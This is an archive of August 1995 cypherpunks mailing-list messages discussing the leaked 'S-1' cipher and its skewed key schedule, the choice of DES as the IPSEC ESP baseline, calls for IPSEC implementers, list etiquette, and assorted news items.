S1 is a real leak. Why aid the traffic analysts by firing off multiple
messages through the remailers ?

BTW, the code has been posted to Usenet by a Frank Falstaff -- look for
message ID <40b8tk$cj4@news.xs4all.nl> in sci.crypt (Wed, Aug. 9, 1995).
His article refers to a message ID (namely <40b50l$oa8@utopia.hacktic.nl>)
that differs from the message ID of the copy sent to c'punks. So it looks
like there was at least one additional recipient. That's a minimum of 5
originals so far....

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Thu, 10 Aug 95 01:45:04 PDT
To: cypherpunks@toad.com
Subject: "S-1" key schedule
Message-ID: <199508100853.EAA13204@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I have to admit I've been staying up late playing with the "S-1"
cipher that was posted here earlier.  Hal Finney already noted what is
clearly a bug in the code; only half the key schedule is ever used,
and only in the first 16 of the 32 rounds.  Even assuming that that
is a typo rather than intentional, "S-1" still appears to suffer from
key-related weaknesses.

The key expansion function in "S-1" produces a skewed key schedule
given uniformly distributed 80 bit input keys.  Here's a histogram
of the distribution of key schedule bytes produced by all 2^32 ways
of generating each byte (each key schedule byte is a function of the
F functions applied to four selected input keys bytes).  The expected
value for each line is 16777216.  For just about any conventional block
cipher, (e.g., DES) we'd expect this graph to be absolutely flat.  Yet
here some values are more than 5% away from expected.  This behavior
appears to be a consequence of the non-uniform distributon of "S-1"'s
F output values, which are used to create the expanded key.

This does not bode well for "S-1"; it means that some key bytes are
applied against the ciphertext slightly more often than others, even when
the input key itself is uniformly chosen.  (Ditto for the outputs of the F
functions themselves, even when their inputs are uniformly distributed,
but that's still another story).

Still, this may not be fatal; the key schedule is still much larger than
the keyspace, so there might not be any easy way for the cryptanalyst to
exploit this property to any great advantage.  It is possible that the
cipher's structure somehow cancels this out in some non-obvious way
that manages to provide a flat 2^80 keyspace, but it's hard to see
exactly how.

My money still says the "TOP SECRET" markings and other clues that
suggest that "S-1" has something to do with Skipjack are a hoax.

-matt


key   number
val  produced #/exptd
--   -------- -------
00 = 16396100 (0.977) ***************************************************
01 = 16153930 (0.963) **************************************************
02 = 15820450 (0.943) *************************************************
03 = 16197600 (0.965) **************************************************
04 = 16142020 (0.962) **************************************************
05 = 15907790 (0.948) *************************************************
06 = 16300820 (0.972) **************************************************
07 = 16471530 (0.982) ***************************************************
08 = 16439770 (0.980) ***************************************************
09 = 16165840 (0.964) **************************************************
0a = 16126140 (0.961) **************************************************
0b = 16693850 (0.995) ****************************************************
0c = 16503290 (0.984) ***************************************************
0d = 16221420 (0.967) **************************************************
0e = 15931610 (0.950) *************************************************
0f = 16705760 (0.996) ****************************************************
10 = 16933000 (1.009) ****************************************************
11 = 16682900 (0.994) ****************************************************
12 = 16338500 (0.974) ***************************************************
13 = 16728000 (0.997) ****************************************************
14 = 16670600 (0.994) ****************************************************
15 = 16428700 (0.979) ***************************************************
16 = 16834600 (1.003) ****************************************************
17 = 17010900 (1.014) *****************************************************
18 = 16978100 (1.012) *****************************************************
19 = 16695200 (0.995) ****************************************************
1a = 16654200 (0.993) ****************************************************
1b = 17240500 (1.028) *****************************************************
1c = 17043700 (1.016) *****************************************************
1d = 16752600 (0.999) ****************************************************
1e = 16453300 (0.981) ***************************************************
1f = 17252800 (1.028) *****************************************************
20 = 16916480 (1.008) ****************************************************
21 = 16666624 (0.993) ****************************************************
22 = 16322560 (0.973) ***************************************************
23 = 16711680 (0.996) ****************************************************
24 = 16654336 (0.993) ****************************************************
25 = 16412672 (0.978) ***************************************************
26 = 16818176 (1.002) ****************************************************
27 = 16994304 (1.013) *****************************************************
28 = 16961536 (1.011) *****************************************************
29 = 16678912 (0.994) ****************************************************
2a = 16637952 (0.992) ***************************************************
2b = 17223680 (1.027) *****************************************************
2c = 17027072 (1.015) *****************************************************
2d = 16736256 (0.998) ****************************************************
2e = 16437248 (0.980) ***************************************************
2f = 17235968 (1.027) *****************************************************
30 = 16416750 (0.979) ***************************************************
31 = 16174275 (0.964) **************************************************
32 = 15840375 (0.944) *************************************************
33 = 16218000 (0.967) **************************************************
34 = 16162350 (0.963) **************************************************
35 = 15927825 (0.949) *************************************************
36 = 16321350 (0.973) ***************************************************
37 = 16492275 (0.983) ***************************************************
38 = 16460475 (0.981) ***************************************************
39 = 16186200 (0.965) **************************************************
3a = 16146450 (0.962) **************************************************
3b = 16714875 (0.996) ****************************************************
3c = 16524075 (0.985) ***************************************************
3d = 16241850 (0.968) **************************************************
3e = 15951675 (0.951) *************************************************
3f = 16726800 (0.997) ****************************************************
40 = 16908220 (1.008) ****************************************************
41 = 16658486 (0.993) ****************************************************
42 = 16314590 (0.972) **************************************************
43 = 16703520 (0.996) ****************************************************
44 = 16646204 (0.992) ****************************************************
45 = 16404658 (0.978) ***************************************************
46 = 16809964 (1.002) ****************************************************
47 = 16986006 (1.012) *****************************************************
48 = 16953254 (1.010) ****************************************************
49 = 16670768 (0.994) ****************************************************
4a = 16629828 (0.991) ***************************************************
4b = 17215270 (1.026) *****************************************************
4c = 17018758 (1.014) *****************************************************
4d = 16728084 (0.997) ****************************************************
4e = 16429222 (0.979) ***************************************************
4f = 17227552 (1.027) *****************************************************
50 = 17003210 (1.013) *****************************************************
51 = 16752073 (0.999) ****************************************************
52 = 16406245 (0.978) ***************************************************
53 = 16797360 (1.001) ****************************************************
54 = 16739722 (0.998) ****************************************************
55 = 16496819 (0.983) ***************************************************
56 = 16904402 (1.008) ****************************************************
57 = 17081433 (1.018) *****************************************************
58 = 17048497 (1.016) *****************************************************
59 = 16764424 (0.999) ****************************************************
5a = 16723254 (0.997) ****************************************************
5b = 17311985 (1.032) ******************************************************
5c = 17114369 (1.020) *****************************************************
5d = 16822062 (1.003) ****************************************************
5e = 16521521 (0.985) ***************************************************
5f = 17324336 (1.033) ******************************************************
60 = 17147760 (1.022) *****************************************************
61 = 16894488 (1.007) ****************************************************
62 = 16545720 (0.986) ***************************************************
63 = 16940160 (1.010) ****************************************************
64 = 16882032 (1.006) ****************************************************
65 = 16637064 (0.992) ***************************************************
66 = 17048112 (1.016) *****************************************************
67 = 17226648 (1.027) *****************************************************
68 = 17193432 (1.025) *****************************************************
69 = 16906944 (1.008) ****************************************************
6a = 16865424 (1.005) ****************************************************
6b = 17459160 (1.041) ******************************************************
6c = 17259864 (1.029) *****************************************************
6d = 16965072 (1.011) *****************************************************
6e = 16661976 (0.993) ****************************************************
6f = 17471616 (1.041) ******************************************************
70 = 16792580 (1.001) ****************************************************
71 = 16544554 (0.986) ***************************************************
72 = 16203010 (0.966) **************************************************
73 = 16589280 (0.989) ***************************************************
74 = 16532356 (0.985) ***************************************************
75 = 16292462 (0.971) **************************************************
76 = 16694996 (0.995) ****************************************************
77 = 16869834 (1.006) ****************************************************
78 = 16837306 (1.004) ****************************************************
79 = 16556752 (0.987) ***************************************************
7a = 16516092 (0.984) ***************************************************
7b = 17097530 (1.019) *****************************************************
7c = 16902362 (1.007) ****************************************************
7d = 16613676 (0.990) ***************************************************
7e = 16316858 (0.973) **************************************************
7f = 17109728 (1.020) *****************************************************
80 = 16920610 (1.009) ****************************************************
81 = 16670693 (0.994) ****************************************************
82 = 16326545 (0.973) ***************************************************
83 = 16715760 (0.996) ****************************************************
84 = 16658402 (0.993) ****************************************************
85 = 16416679 (0.979) ***************************************************
86 = 16822282 (1.003) ****************************************************
87 = 16998453 (1.013) *****************************************************
88 = 16965677 (1.011) *****************************************************
89 = 16682984 (0.994) ****************************************************
8a = 16642014 (0.992) ****************************************************
8b = 17227885 (1.027) *****************************************************
8c = 17031229 (1.015) *****************************************************
8d = 16740342 (0.998) ****************************************************
8e = 16441261 (0.980) ***************************************************
8f = 17240176 (1.028) *****************************************************
90 = 17416210 (1.038) ******************************************************
91 = 17158973 (1.023) *****************************************************
92 = 16804745 (1.002) ****************************************************
93 = 17205360 (1.026) *****************************************************
94 = 17146322 (1.022) *****************************************************
95 = 16897519 (1.007) ****************************************************
96 = 17315002 (1.032) ******************************************************
97 = 17496333 (1.043) ******************************************************
98 = 17462597 (1.041) ******************************************************
99 = 17171624 (1.024) *****************************************************
9a = 17129454 (1.021) *****************************************************
9b = 17732485 (1.057) *******************************************************
9c = 17530069 (1.045) ******************************************************
9d = 17230662 (1.027) *****************************************************
9e = 16922821 (1.009) ****************************************************
9f = 17745136 (1.058) *******************************************************
a0 = 17581410 (1.048) ******************************************************
a1 = 17321733 (1.032) ******************************************************
a2 = 16964145 (1.011) *****************************************************
a3 = 17368560 (1.035) ******************************************************
a4 = 17308962 (1.032) ******************************************************
a5 = 17057799 (1.017) *****************************************************
a6 = 17479242 (1.042) ******************************************************
a7 = 17662293 (1.053) *******************************************************
a8 = 17628237 (1.051) *******************************************************
a9 = 17334504 (1.033) ******************************************************
aa = 17291934 (1.031) ******************************************************
ab = 17900685 (1.067) *******************************************************
ac = 17696349 (1.055) *******************************************************
ad = 17394102 (1.037) ******************************************************
ae = 17083341 (1.018) *****************************************************
af = 17913456 (1.068) *******************************************************
b0 = 17048640 (1.016) *****************************************************
b1 = 16796832 (1.001) ****************************************************
b2 = 16450080 (0.981) ***************************************************
b3 = 16842240 (1.004) ****************************************************
b4 = 16784448 (1.000) ****************************************************
b5 = 16540896 (0.986) ***************************************************
b6 = 16949568 (1.010) ****************************************************
b7 = 17127072 (1.021) *****************************************************
b8 = 17094048 (1.019) *****************************************************
b9 = 16809216 (1.002) ****************************************************
ba = 16767936 (0.999) ****************************************************
bb = 17358240 (1.035) ******************************************************
bc = 17160096 (1.023) *****************************************************
bd = 16867008 (1.005) ****************************************************
be = 16565664 (0.987) ***************************************************
bf = 17370624 (1.035) ******************************************************
c0 = 16705850 (0.996) ****************************************************
c1 = 16459105 (0.981) ***************************************************
c2 = 16119325 (0.961) **************************************************
c3 = 16503600 (0.984) ***************************************************
c4 = 16446970 (0.980) ***************************************************
c5 = 16208315 (0.966) **************************************************
c6 = 16608770 (0.990) ***************************************************
c7 = 16782705 (1.000) ****************************************************
c8 = 16750345 (0.998) ****************************************************
c9 = 16471240 (0.982) ***************************************************
ca = 16430790 (0.979) ***************************************************
cb = 17009225 (1.014) *****************************************************
cc = 16815065 (1.002) ****************************************************
cd = 16527870 (0.985) ***************************************************
ce = 16232585 (0.968) **************************************************
cf = 17021360 (1.015) *****************************************************
d0 = 16949520 (1.010) ****************************************************
d1 = 16699176 (0.995) ****************************************************
d2 = 16354440 (0.975) ***************************************************
d3 = 16744320 (0.998) ****************************************************
d4 = 16686864 (0.995) ****************************************************
d5 = 16444728 (0.980) ***************************************************
d6 = 16851024 (1.004) ****************************************************
d7 = 17027496 (1.015) *****************************************************
d8 = 16994664 (1.013) *****************************************************
d9 = 16711488 (0.996) ****************************************************
da = 16670448 (0.994) ****************************************************
db = 17257320 (1.029) *****************************************************
dc = 17060328 (1.017) *****************************************************
dd = 16768944 (1.000) ****************************************************
de = 16469352 (0.982) ***************************************************
df = 17269632 (1.029) *****************************************************
e0 = 16953650 (1.011) ****************************************************
e1 = 16703245 (0.996) ****************************************************
e2 = 16358425 (0.975) ***************************************************
e3 = 16748400 (0.998) ****************************************************
e4 = 16690930 (0.995) ****************************************************
e5 = 16448735 (0.980) ***************************************************
e6 = 16855130 (1.005) ****************************************************
e7 = 17031645 (1.015) *****************************************************
e8 = 16998805 (1.013) *****************************************************
e9 = 16715560 (0.996) ****************************************************
ea = 16674510 (0.994) ****************************************************
eb = 17261525 (1.029) *****************************************************
ec = 17064485 (1.017) *****************************************************
ed = 16773030 (1.000) ****************************************************
ee = 16473365 (0.982) ***************************************************
ef = 17273840 (1.030) *****************************************************
f0 = 16573690 (0.988) ***************************************************
f1 = 16328897 (0.973) ***************************************************
f2 = 15991805 (0.953) *************************************************
f3 = 16373040 (0.976) ***************************************************
f4 = 16316858 (0.973) **************************************************
f5 = 16080091 (0.958) **************************************************
f6 = 16477378 (0.982) ***************************************************
f7 = 16649937 (0.992) ****************************************************
f8 = 16617833 (0.991) ***************************************************
f9 = 16340936 (0.974) ***************************************************
fa = 16300806 (0.972) **************************************************
fb = 16874665 (1.006) ****************************************************
fc = 16682041 (0.994) ****************************************************
fd = 16397118 (0.977) ***************************************************
fe = 16104169 (0.960) **************************************************
ff = 16886704 (1.007) ****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 10 Aug 95 05:29:41 PDT
To: cypherpunks@toad.com
Subject: ciphergroupies
Message-ID: <v02120d01ac4f9581290f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


As one of ciphergroupies (call a spade a spade, the man said, and, frankly,
I don't write code, much less cryto-code) I agree with Perry.

While I understand that crypto isn't the only thing discussed on this list,
it used be quite apparent to anyone who signed on to this list that strong
crypto and its consequences was the the focus of the group.  Some days it's
very apparent that that is not the focus.

My mail.torrent skills are pretty well advanced these days, because I sit
on lots of mail groups. The first high volume one was cypherpunks, where I
got my bones in such matters, and I've gotten pretty adept at thrashing the
noise out of the way. However, it does seem that, like Tim said a while
ago, we're getting a lot of forwards from other groups, which dilute the
content here pretty significantly.

I've done this myself. A lot. Not as much as I used to, but it still
happens: I just forwarded here an announcement for a digital commerce
conference in Texas, for instance.

So, I have a few suggestions. First, we might try to be more considerate of
the other's wetware, while developing our own, and try to limit our
postings to this net to original contributions where possible, even if it's
just a summary of something you've read. Write it in your own words, in
other words ;-). I'm not saying rewrite instead of forward if the message
is extremely crypto (or consequent) relevant, we get action messages from
EPIC, for instance, which are mostly relevant (opinions of the efficacy of
EPIC aside, of course).

Second, if you have something which people here might be interested in, and
it's vaguely tangental, post a pointer.  The classic case here is someone,
who shall remain nameless for reasons you'll see in a moment, who's
brilliantly cryptic (!) pointers to his droid-fed article stash have been a
very useful and pleasantly salient feature of the landscape here for more
than a year now.

You can point to an FTP file, a web page, have people ask for it in an
e-mail reply from you, and if it's something er, professionally written,
and want it handled er, gingerly, you can probably contact the above
mentioned droid-master for his help in distributing your find. I just sent
him such an article on dark fiber / frequency multiplexing which he pointed
the group to within the last week. Not that you should choke the droid
factory, mind you, but it can be done in a special circumstance.

Perry seems pretty burned up, and he's burned up for the right reasons, not
the least of which is that he's been busting his butt in a project which
will encrypt the net at the very core: the TCP/IP layer itself. This is
very very important, and people should pay attention to it, and help
however they can. (It's also likely to make Perry insufferable --
deservedly -- pretty soon ;-)). Like everyone else, he subscribes to this
group to learn more about crypto, and he's finding the crypto content
dwindling, the "S1" discussion notwithstanding, and as someone who's
invested a lot of time, energy, and emotions in this group, he doesn't
sound happy about it.

This is also compounded by the fact that while Perry is one of my favorite
people here, Perry is also a grouch. I usually laugh when he goes over the
top about something, because his polemics are some of the best I've ever
seen. That doesn't make it any better if you're on the receiving end of
such invective, and he's pissed off people who agree with him most of the
rest of the time as a result. He's usually right, however, and he's a
grownup, so I don't think he's going to change his tone anytime soon, and
I've just learned to ignore his more inflamitory remarks as a cost of doing
business with his not inconsiderable talents.  That goes for several people
around here, by the way, and it's a shame when they don't play well with
others, but, like Perry, they're grownups. Another cost of doing business.

So, in summary, point instead of forward where possible, particularly if
it's not explicitly crypto or crypto consequent; a good immediate way to
help the cause of crypto on the net is to bone up on this IPSP stuff and
see what you can do to help, because it's very important; and Perry and
other people here are grouches and can't seem to play nice with each other
on occasion (So, what else is new? ;-)).

Cheers,
Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 06:00:28 PDT
To: cypherpunks@toad.com
Subject: CAC_kle
Message-ID: <199508101300.JAA14840@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-95. NYPaper Page-Oner:


   "With Internet Cachet, Not Profit, New Stock Is Wall St.'s
   Darling."

      A 15-month-old company that has never made a dime of
      profit had one of the most stunning debuts in Wall
      Street history yesterday as investors rushed to pour
      their money into cyberspace. The Netscape Communications
      Corporation became the latest -- and hottest -- company
      in the Internet business to list shares on the nation's
      stock exchanges. Shares of Netscape, which had been
      priced at $28 before trading began at 11 A.M. opened far
      higher -- at $71. The shares soon surged to as high as
      $74.75. It was the best opening day for a stock in Wall
      Street history for an issue of its size. But even more
      significantly, it was a sign of how the rush to
      commercialize the global computing web known as the
      Internet has created an investor frenzy not seen in the
      technology industry since the early days of the personal
      computer more than a decade ago. "There is a mania under
      way," said Michael Murphy, the editor of The Overpriced
      Stock Service, a newsletter in Half Moon Bay, Calif.

      The company's co-founder and chairman, who holds 9.7
      million shares, ended up holding a stake valued at a
      half-billion dollars. Making his first fortune yesterday
      was Marc L. Andreessen, Netscape's 24-year-old vice
      president of technology and an inventor of its prize
      software. Based on yesterday's closing price, his
      interest in Netscape is worth more than $58 million.


   CAC_kle











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 10 Aug 95 06:10:07 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might
Message-ID: <9508101310.AA25693@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> On a fair number of occassions I have been told that federal type folks
> have made statements to the effect that there is no such thing as a "TOP
> SECRET" classification of US government docs. Since really secret things
> tend to get neither confirmed nor denied, I am inclined to believe this.
> Thus SECRET is the top classification in today's government/military. If
> anybody knows otherwise I would be interested in the information.
> JWS

Well, I held an active SECRET clearance until last November. This is 
how I remember it.

There are three basic levels of classification - 
Confidential, Secret, and Top Secret. There are many sub-categories,
such as FOUO (For Official Use Only), NOFORN (no foreigners), COMSEC
(Communications Security) etc. Within TS, data may be placed in 
'compartments', the names of which may themselves be classified, and 
separate clearance is needed for each compartment. 

Orthoganal to that is the existance of three separate agencies which
provide clearance - the Department of Energy, the Department of 
Defense, and the NSA. If you had a DoD clearance, that did not cut 
much ice with the spooks - you needed to have a separate 
investigation to their standards (though the actual groundpounding and 
investigation was done by the same organization for all three).

Finally, there was 'need to know'. It didn't matter if you had a Tippy
Toppest Secret clearance, signed by the directors of the NRO, NSA, 
and DoE; if there was a piece of classified information which was not
relevant to your work, you didn't get it. (One of the problems with 
the system is that this leads to a lot of duplicated effort).

While I did not get to see Top Secret data (and in fact, avoided 
classified projects whenever possible), TS was a very real 
classification level at least until late last year. The only 
explanation I can think of for your claim above is that most TS data is 
not simply 'TS'; it usually has various endorsments, such as 
which compartment it's in. 

Peter Trei





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 10 Aug 95 06:28:38 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
Message-ID: <199508101327.JAA14573@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I suppose this is really addressed at Perry:
| 
| Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 
| If someone's IP traffic is being monitored and collected offline by some
| agency then they're going to get about a couple of hours of security while
| the special purpose key search hardware kicks into action.  I know other
| algorithms can optionally be used, but surely it would have been better to
| have a second, stronger algorithm specified mandatory as well. 

	Since Perry is hopefully off busily implementing things, I'll
try to answer. :)

	First, DES is still pretty strong.  Try throwing Pentiums at
it.  It suffices as a fast, known to be reasonably strong, block
ethernet sniffers algorithim.

	Second, no other algotrithm is known to be well designed.  We
can trust that the NSA did a fair job in the design.  Thus, choosing a
second algorithm is a difficult, and political task.  (There are also
patent and licensing issues with other ciphers)

	So, in order to ship sooner rather than later, DES was chosen.
3DES will probably be available soon afterwards.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Thu, 10 Aug 95 07:44:01 PDT
To: cypherpunks@toad.com
Subject: commercial advance vcrs
Message-ID: <199508101453.JAA01058@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


This isn't directly relevant to crypto, but it is a scheme to allow people
to filter out unwanted media content.  Has anyone heard of it, and does
anyone know how it works? 

This is from TV Guide:

CHEERS to commercial-free TV, or more exactly, Commercial Advance VCRs.  
Check it out:  this month, RCA will unveil a VCR that skips past 
virtually all commercials during playback of a recorded show.  Imagine:  
three minutes of commercials will whiz by in 10 seconds.  The downside?  
This summer, commercials may be the most interesting things on network 
tv.

--
Alex Strasheim, alex@proust.suba.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 10 Aug 95 08:56:29 PDT
To: cypherpunks@toad.com
Subject: noise pollution, conspiracy theory, Perry's pet peeve
Message-ID: <199508101556.JAA06190@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> You have become an impediment -- a lump of rock in the highway. You aren't
> part of the solution -- you are part of the problem.


I have to concur on this point.  Posting conspiracy tracts to cypherpunks, or
posting algorithm ideas to the conspiracy list, only serves to dilute the
primary function of the list in question.


J. Orlin Grabbe's actions in this respect are harmful (though of course
I don't think they are malicious.)


Bryce
signatures follow:

                                +
                                 /.       island Life in a chaos sea
                                 /             bryce.wilcox@colorado.edu
                                 ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMCosBvWZSllhfG25AQFWlQQAocyn68Ehj6S2gGvPnhnMglrWdKFsw3s8
+eJWlMMVsXfV7NVAezoxVaia5Uw0kXCc0liQRmXz/T5jJQHI/ko2PxQQ7PI2TeRa
RiEM327boHr87WrtJO+3jInqjGDgjKkiBXW07QNZjvZudlEdm05XLGtJeVSRmIFJ
xKvbLVj5v5M=
=B1KZ
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 10 Aug 95 07:39:58 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: ciphergroupies
In-Reply-To: <v02120d01ac4f9581290f@[199.0.65.105]>
Message-ID: <199508101435.KAA03188@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As one of ciphergroupies (call a spade a spade, the man said, and, frankly,
> I don't write code, much less cryto-code) I agree with Perry.

For anyone who is interested in writing code and other related
activies I'm willing to redistribute the cypherpunks from my site via
MailWeir so users can kill and prune what messages they read and which
ones they don't.


/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 07:52:58 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508100310.XAA11723@bwh.harvard.edu>
Message-ID: <199508101452.KAA24637@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> | IPSEC is now a Proposed Standard.
> 
> | Again, *we need your help*. Cypherpunks write code. Help us make the
> | internet safe for personal privacy by contributing to this effort.
> 
> 	How about posting a list of 'things that need doing?'  I
> assume one is floating around, possibly even with time estimates?

The IETF was challenged by Steve Crocker to be ready for use of IPSEC
for the Dallas meeting in December so that no IETFer who wanted to
communicate securely with his home site need be insecure.

To accomplish that, we need to produce versions of the security stack
for many architectures. Right now, we have AIX and 4.4BSD fairly
solidly covered. Less well covered is HPUX. People familiar with code
like the Trumpet Winsock stack, Linux, or who have access to the
innards of SunOS, Solaris, Windows 95, Mac stacks, and others, and can
legitimately release implementations for those platforms, are probably
needed. We need serious commitments from people but of course everyone
is trying to help everyone else along.

Basically, if you know how to hack kernels and networking code and you
have a platform you can work on, we need you.

We also lack work on the key management end of things -- people who
can start playing around with implementing Photuris, even on a "toy"
basis, would probably be of help.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Thu, 10 Aug 95 08:01:10 PDT
To: cypherpunks@toad.com
Subject: Re: Dir.Byway Virus (NewsClip)
Message-ID: <199508101500.LAA20644@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




turner@telecheck.com writes:
>Seems like a good-press piece for a small anti-viral software
>company.  Just one small pick to nit:

Actually, Dr. Sol's AVTK is consistently one of the very top DOS virus
scanners, in terms of percent of known viruses it catches.

>anonymous-remailer@shell.portal.com said:
>> Bitton said the company's "Dr. Solomon's Anti-Virus Toolkit" will 
>> remove the virus from infected computers. New versions of the Toolkit 
>> for DOS, Windows, OS/2, and NetWare are slated to ship in late 
>> summer. S&S also plans Fall 1995 introductions of Toolkits for 
>> Macintosh, SCO Unix, Windows 95, and Windows NT server and 
>> workstations.
>
>Windows NT has an abstracted and object oriented design.  User mode
>programs no longer have access to the hardware (ie., you no longer
>have access to the boot sector, and cannot hook an interrupt).  In
>short, viruses are much less likely to function under NT, yet these
>blood-sucking people can't wait to introduce software for it...

I can't speak for S&S, but I'd bet that what they are introducing is
a scanner for archives of MS-DOS programs hosted on NT systems.
Although it may be that NT-specific viruses have started appearing.
(The restrictions on file access don't slow the spread of file
infectors all that much -- it's enough for them to infect those things
they have write permission for.  I think the good Dr. Cohen has done
some research on this?)

In any case, this is more appropriate for comp.virus than cpunks.

--
David R. Conrad, ab411@detroit.freenet.org, http://web.grfn.org/~conrad/
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 10 Aug 95 03:15:19 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system
In-Reply-To: <199508100443.EAA00611@orchard.medford.ma.us>
Message-ID: <Pine.SOL.3.91.950810110954.4480E-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Bill Sommerfeld wrote:
 
> It looks very much like the sort of typo you would get from a
> mistranslation from assembly language if the target architecture had a
> *4-bit* processor. (This is also consistant with the "<<4"'s which
> show up in several places in the code).

I'll back up the disassembly theory.  I've done it myself once when I 
lost some of my own source code from years previous and had to get out 
the dissassembler.  Very painful work which resulted in a first set of 
source much like the "S1" sample posted here.  Only difference was that I 
went back over the "first draft" after verifying it and cleaned it up 
somewhat.

The poster either does not know 'C' or thinks that a cleanup will reveal 
his/her style.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 08:26:57 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <Pine.SOL.3.91.950810133448.4480H-100000@eagle.nexor.co.uk>
Message-ID: <199508101521.LAA05002@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Andy Brown writes:
> I suppose this is really addressed at Perry:
> 
> Why was (single) DES chosen as the algorithm for the ESP part of IPSEC? 

It wasn't. Well, it wasn't *really*.

IPSEC is a framework into which you drop any algorithm you like --
IDEA, 3DES, Skipjack (:-), or anything else. We picked a baseline
algorithm to assure interoperability, but it is not our expectation
that people would want to use DES in practice. Picking DES was largely
a political, not a technical decision. RFCs describing 3DES and SHA
modes are in the pipeline right now -- they are going before the IESG
"real soon now".

> I know other algorithms can optionally be used, but surely it would
> have been better to have a second, stronger algorithm specified
> mandatory as well.

Well, lets remember this: algorithms go sour with time, like dairy
products. People are going to have to get used to regularly switching
them very soon anyway. Think of this as just a way to get people in
the habit of building their implementations modularly from the start.

My recommendation is that all implementations include 3DES in their
initial algorithm set. I'm going to do it with mine.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 10 Aug 95 08:25:44 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Why DES in IPSEC ESP?
In-Reply-To: <199508101327.JAA14573@bwh.harvard.edu>
Message-ID: <199508101525.LAA06371@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> choosing a second algorithm is a difficult, and political task.
[...]
> So, in order to ship sooner rather than later, DES was chosen.

Well, if you define "ship" as "get the standards approved" you have
the situation nailed. We basically could all agree on DES and the
marketplace will dictate that in practice everyone has 3DES and other
things available too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mhobbs@rad.rpslmc.edu (Michael Hobbs)
Date: Thu, 10 Aug 95 09:59:56 PDT
To: cypherpunks@toad.com
Subject: questions/info on premail
Message-ID: <199508101701.AA09184@rad.rpslmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


To all.

Is there anyone out there that has incorporated premail
into another script?  Like a mail script or cgi script.
I'm trying to expand the idea of integrating anon-mailers
into web pages for more ease of use.  If anyone has
directly linked premail to a page, please let me know.  I
am having some problems calling it from a script and I 
thought someone might have solved this problem already.

I wrote to Raph about this, but as you might know, his page
states that he got married on Aug 5, so I don't expect the
speediest of replies :)

Michael Hobbs
dochobbs@wwa.com
